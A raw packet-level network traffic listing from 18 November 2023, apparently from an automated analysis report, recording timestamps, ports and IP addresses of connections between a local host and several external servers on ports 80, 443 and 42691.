Nov 18, 2023 10:02:31.803010941 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803013086 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803025007 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803030968 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803039074 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803049088 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803050995 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803064108 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803077936 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803090096 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803093910 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803116083 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803127050 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803136110 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803136110 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803139925 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803153992 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803164959 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803170919 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803179979 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803193092 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803193092 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803205967 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803220034 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803225040 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803234100 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803246975 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803255081 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803260088 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.803276062 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.803306103 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.814529896 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.923340082 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:31.923454046 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:31.925635099 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:31.925651073 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:31.925993919 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:31.928004026 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:31.969259977 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:32.098253012 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098278999 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098293066 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098306894 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098325014 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098339081 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098360062 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.098398924 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098413944 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098414898 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.098427057 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098443985 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098454952 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.098458052 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098473072 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098485947 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.098486900 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098500967 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098514080 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098526001 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.098529100 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.098539114 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.098577023 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099037886 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099051952 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099065065 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099095106 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099126101 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099139929 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099162102 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099267006 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099281073 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099292994 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099306107 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099318027 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099318027 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099329948 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099333048 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099344969 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099354029 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099359035 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099371910 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099389076 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099390030 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099400997 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099417925 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099430084 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099433899 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099442005 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099442959 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099456072 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099464893 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099469900 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099488974 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099493027 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099507093 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099520922 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099533081 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099545002 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099545002 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099558115 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099562883 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099570990 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:32.099579096 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.099605083 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:32.254563093 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:32.254626989 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:32.551095009 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:32.555654049 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:32.589163065 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:32.589184999 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:32.651331902 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:32.651437044 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:32.651494026 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:32.652173996 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:32.654515982 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:32.654602051 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:32.654681921 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:32.655092001 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:32.655128002 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:32.885718107 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:32.890566111 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:32.917026997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:32.968605995 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:32.971158028 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:32.971199036 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.005526066 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:33.215207100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.215322971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.215631008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.440901995 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:33.513735056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514277935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514421940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514436007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514447927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514461040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514473915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514486074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514491081 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.514498949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514513016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514523029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.514550924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.514595985 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.671649933 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.671715021 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.671770096 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.671794891 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.671812057 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.671850920 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.671894073 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.671917915 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.671955109 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.671968937 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.671984911 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.672036886 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.672272921 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.672343016 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.672393084 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.672406912 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.744857073 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:33.744920015 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:33.744940042 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:33.744999886 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:33.813038111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813093901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813117981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813134909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813262939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813262939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813282013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813296080 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813299894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813338995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813357115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813368082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813374043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813397884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813399076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813416958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813431978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813432932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813448906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813466072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813472033 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813483000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813498974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813508987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813515902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813529015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813534021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813550949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:33.813565969 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.813599110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:33.845638037 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.845694065 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.845709085 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.845753908 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.845810890 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.845921040 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.846370935 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.846414089 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.846446991 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.846463919 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.846550941 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.846564054 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.847254992 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.847300053 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.847311974 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.847325087 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.847376108 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.847387075 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.848083019 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.848121881 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.848133087 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.848145008 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.848196030 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.848929882 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.848997116 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.849037886 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.849050999 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.849109888 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.849766016 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.849829912 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.849865913 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.849883080 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.849895954 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:33.849947929 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:33.911772013 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:34.020133018 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.020260096 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.020370960 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.020663977 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.020709991 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.020756006 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.021440029 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.021492958 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.023468018 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.023528099 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.023648024 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.024017096 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.024115086 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.024382114 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.024447918 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.024924040 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.024986029 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.025701046 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.025769949 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.026597977 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.026679993 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.027467012 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.027506113 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.027532101 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.027566910 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.027604103 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.028304100 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.028368950 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.028383970 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.028439999 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.029195070 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.029287100 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.112596989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112622976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112643003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112659931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112679005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112678051 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.112715960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.112783909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112801075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112823009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112828016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.112839937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112855911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112868071 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.112873077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112890959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112903118 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.112907887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112924099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112927914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.112941027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112957954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112968922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.112973928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112991095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.112998009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113008022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113024950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113043070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113051891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113061905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113078117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113090992 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113095999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113111019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113112926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113130093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113147020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113149881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113168001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113183022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113184929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113202095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113209009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113219023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113238096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113270044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113276958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113296032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113322020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113320112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113343954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113364935 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113365889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113384962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113394022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113403082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113420010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.113436937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.113462925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.194672108 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.194797993 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.194891930 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.194960117 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.195137024 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.195208073 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.195787907 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.195854902 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.196635962 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.196703911 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.197540045 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.197601080 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.198365927 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.198410988 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.198426008 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.198446035 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.198482037 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.199239969 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.199300051 CET	49743	443	192.168.2.4	104.21.89.193
